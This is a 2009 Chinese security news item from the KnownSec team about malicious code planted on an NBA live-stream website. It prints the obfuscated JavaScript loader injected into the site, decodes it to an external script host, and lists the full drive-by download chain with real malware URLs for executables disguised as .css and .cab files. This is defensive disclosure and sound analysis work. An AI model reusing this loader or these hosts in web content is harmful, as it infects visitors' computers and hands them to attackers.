NBA现场直播网被植入恶意代码

来源:岁月联盟 编辑:zhuzhu 时间:2009-04-02
道创宇安全团队(KnownSec team)于3月31日捕获NBA现场直播网(http://www.nbaxianchang.cn/)被植入恶意代码。用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。 ...道创宇安全团队(KnownSec team)于3月31日捕获NBA现场直播网(http://www.nbaxianchang.cn/)被植入恶意代码。

用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.nbaxianchang.cn/include/dedeajax2.js

网页被嵌入恶意链接代码:

 090331snap1.jpg

function goad(){var Then = new Date()
Then.setTime(Then.getTime() + 24*60*60*1000)
var cookieString = new String(document.cookie)
var cookieHeader = “Cookie1=”
var beginPosition = cookieString.indexOf(cookieHeader)
if (beginPosition != -1){ } else { document.cookie = “Cookie1=Filter;expires=”+ Then.toGMTString()
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?”:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return’//w+’};c=1};while(c–)if(k[c])p=p.replace(new RegExp(’//b’+e(c)+’//b’,'g’),k[c]);return p}(’4.9(”<7 8=6:////a.%2%0.3//%1.5><//7>”)’,62,11,’2D520|6A|6Ci|cn|document|gif|http|script|src|writeln|www’.split(’|'),0,{}));window.status=”完毕”;}}goad();

解密后链接为:http://www.li-520.cn/j.gif

挂马分析:
[wide]http://www.nbaxianchang.cn/
 [script]http://www.nbaxianchang.cn/include/dedeajax2.js
  [script]http://www.li-520.cn/j.gif
   [frame]http://sjfhsk.cn:6135/b148610/b14.htm
    [frame]http://sjfhsk.cn:6135/b148610/new.html
     [frame]http://sjfhsk.cn:6135/b148610/fx.htm
     [frame]http://sjfhsk.cn:6135/b148610/../14.htm
      [script]http://sjfhsk.cn:6135/b148610/../14.js
       [exe]http://c-bp.cn:6135/qwer/ms.css
     [frame]http://sjfhsk.cn:6135/b148610/../as.htm
      [exe]http://c-bp.cn:6135/qwer/as.css
     [frame]http://sjfhsk.cn:6135/b148610/../bfyy.htm
      [script]http://sjfhsk.cn:6135/b148610/../bf.js
       [exe]http://c-bp.cn:6135/qwer/bf.css
     [frame]http://sjfhsk.cn:6135/b148610/../lzz.htm
      [script]http://sjfhsk.cn:6135/b148610/../lzz.js
       [exe]http://c-bp.cn:6135/qwer/lzz.css
     [frame]http://sjfhsk.cn:6135/b148610/../real10.htm
      [script]http://sjfhsk.cn:6135/b148610/../real.js
       [exe]http://c-bp.cn:6135/qwer/re.css
     [frame]http://sjfhsk.cn:6135/b148610/../real11.htm
      [script]http://sjfhsk.cn:6135/b148610/../realplay.js
       [exe]http://c-bp.cn:6135/qwer/real11.css
     [frame]http://sjfhsk.cn:6135/b148610/../cx.htm
      [script]http://sjfhsk.cn:6135/b148610/../xmybrx.js
       [exe]http://c-bp.cn:6135/qwer/adr.css
     [script]http://sjfhsk.cn:6135/b148610/../wewew.js
      [cab]http://c-bp.cn:6135/baidu.cab
    [script]http://count1.51much.com/cnt.php?uid=ua-1-12775&style=icon
    [script]http://s131.cnzz.com/stat.php?id=1138910&web_id=1138910

最终下载病毒文件:
http://c-bp.cn:6135/qwer/ms.css
http://c-bp.cn:6135/qwer/as.css
http://c-bp.cn:6135/qwer/bf.css
http://c-bp.cn:6135/qwer/lzz.css
http://c-bp.cn:6135/qwer/re.css
http://c-bp.cn:6135/qwer/real11.css
http://c-bp.cn:6135/qwer/adr.css
http://c-bp.cn:6135/baidu.cab

通过执行以上病毒文件,来达到完全控制访问者的系统。

知道创宇安全团队(KnownSec team)建议用户及时安装系统安全更新补丁,使用杀毒软件开启监控保护系统免受病毒侵入。

关键字:NBA
上一篇:黑客破网银多数跟不良习惯所致
下一篇:UltraDNS遭黑客DDoS攻击 中断数小时

最近更新

随机推荐